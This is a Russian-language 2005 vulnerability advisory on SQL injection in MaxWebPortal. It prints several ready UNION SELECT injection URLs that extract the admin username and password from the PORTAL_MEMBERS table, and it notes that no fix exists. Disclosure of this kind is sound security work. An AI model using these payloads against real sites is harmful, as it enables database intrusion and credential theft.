Security Lab

SQL-инъекция в MaxWebPortal

Дата публикации:04.05.2005
Всего просмотров:1186
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: MaxWebPortal

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Уязвимость существует во многих сценариях из-за отсутствия фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,
NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select m_username,m_password,1,1,1,1,1,
1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_
DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,
1,1,1,1,1 from PORTAL_MEMBERS
where m_username='admin' union select

pics_popular.asp?10 LINK_ID, HIT,NAME, URL,
KEYWORD, DESCRIPTION, EMAIL, POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW,
BADLINK FROM pic union select m_username,m_password,
1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

dl_toprated.asp?10 RATING,Votes,DESCRIPTION,
NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from
PORTAL_MEMBERS where m_username='admin' union select

custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]

custom_link.asp?method=Forum&Forum_ID=[Sql inject]

URL производителей: www.maxwebportal.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Critical bug in Maxwebportal (Critical sql injections)